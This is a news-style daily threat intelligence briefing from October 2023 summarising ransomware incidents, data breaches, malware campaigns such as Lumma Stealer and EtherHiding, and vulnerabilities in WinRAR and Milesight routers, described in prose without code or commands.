We use cookies to improve your experience. Do you accept?

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Oct 16, 2023

The healthcare industry and public health data remain a significant target for ransomware groups like NoEscape. Federal authorities released an alert against the threat group and its activities and said “a successful exploitation by NoEscape ransomware will almost certainly result in the encryption and exfiltration of significant quantities of data.” Separately, Discord users are being advised to stay cautious of direct messages, especially those offering enticing rewards, as they may contain malware. This comes in light of the discovery of a malicious campaign dropping the information-stealing malware called Lumma Stealer via Discord.

The decentralized nature of blockchain has appeared to be a blocker in containing an attack chain that is being tracked as monikers EtherHiding (Guardio Labs) and ClearFake (Sekoia). The campaign leads to the deployment of various malware loaders and trojans on infected WordPress sites.

Top Breaches Reported in the Last 24 Hours

5TB of data stolen from two organizations, each

The ALPHV ransomware group allegedly compromised the networks of Quality Service Installation (QSI), Inc., an ITM and ATM solutions provider, which potentially exposed a 5TB SQL database, as well as financial and client information from various sectors. Meanwhile, it added Morrison Community Hospital to its list of victims, concerning 5TB of patients’ and employees’ information, backups, PII documents, and more.

Kwik Trip store chain suffers outages

Kwik Trip, a convenience store chain with more than 800 stores across the U.S., experienced widespread technology issues that disrupted services throughout the week. The company faced problems with its app, reward system, and phone service, which impacted customers attempting to make purchases. While the company confirmed the outages resulted from a "network incident," it did not provide information regarding whether it was a ransomware attack.

Decathlon’s employee data exposed

Data from an alleged Decathlon data breach, that occurred two years ago, has surfaced on the dark web. Approximately 8,000 Decathlon employees' PII, including full names, usernames, phone numbers, email addresses, residence locations, authentication tokens, and photographs, were exposed. The leak also contained information fromBluenove, a technology and consulting firm, which confirmed that duplicate copies of the database were circulating on darknet forums. There is no official statement or response from either of them so far.

LockBit locks CDW for $80 million ransom

Technology services company CDW launched an investigation into ransom demands made by the LockBit ransomware group as it crippled the firm’s network. CDW identified suspicious activity on its Sirius Federal servers, isolated from its main network, which is dedicated to internal support for the subsidiary. Data taken from these servers has been published on the dark web. LockBit reportedly demanded an $80 million ransom from CDW, but the company only offered $1.1 million.

Top Malware Reported in the Last 24 Hours

Healthcare sector warned of NoEscape

Federal authorities issued a warning about the relatively new multi-extortion RaaS group called NoEscape which has listed a total of 77 victims in its leak site. Emerged in May, NoEscape is believed to be a successor to the defunct Avaddon gang, which has been targeting various industries, including healthcare and public health organizations. The group uses aggressive multi-extortion tactics, with extortion demands ranging from hundreds of thousands to over $10 million. NoEscape also offers DDoS attacks as an additional service to its affiliates.

Lumma Stealer leverages Discord for malware delivery

Security researchers discovered threat actors using the Discord platform to distribute Lumma Stealer, an information-stealing malware. Attackers leverage Discord's Content Delivery Network (CDN) to host and spread Lumma Stealer while creating bots via Discord's API to remotely control the malware. The malware is designed to steal user credentials, cryptocurrency wallets, and browser data. Lumma Stealer is sold as a service in underground forums, with different pricing tiers based on features and capabilities.

Binance's Smart Chain serves malicious code

Threat actors have been discovered using Binance's Smart Chain (BSC) contracts to serve malicious code in an ongoing campaign known as EtherHiding. Initially observed two months ago, this campaign leverages compromised WordPress sites, where visitors are presented with a fake browser update warning, leading to the deployment of information-stealing malware. Cyber analysts at Sekoia are tracing the campaign as ClearFake and have published additional details about the broader campaign.

Top Vulnerabilities Reported in the Last 24 Hours

Pro-Russian hacking groups abuse WinRAR bug

Pro-Russian hacking groups were observed using a recently disclosed security vulnerability (CVE-2023-38831) in the WinRAR compression software to conduct a phishing campaign aimed at harvesting credentials from compromised systems. The attack involves malicious archive files containing a booby-trapped PDF file that executes a Windows Batch script when clicked. This script launches PowerShell commands to open a reverse shell, providing the attacker with remote access to the victim's system.

Milesight industrial routers at risk

Multiple UR-series industrial cellular routers from Chinese IoT and video surveillance product manufacturer Milesight (Ursalink) were found to be affected by a serious vulnerability (CVE-2023-43261). This flaw exposed system log files containing passwords for administrators and other users. While the passwords weren't stored in plain text, they could be cracked. Milesight claimed it was already aware of the issue and had patched it. However, VulnCheck observed potential exploitation of the vulnerability on a small scale, with attackers possibly conducting reconnaissance.

Related Threat Briefings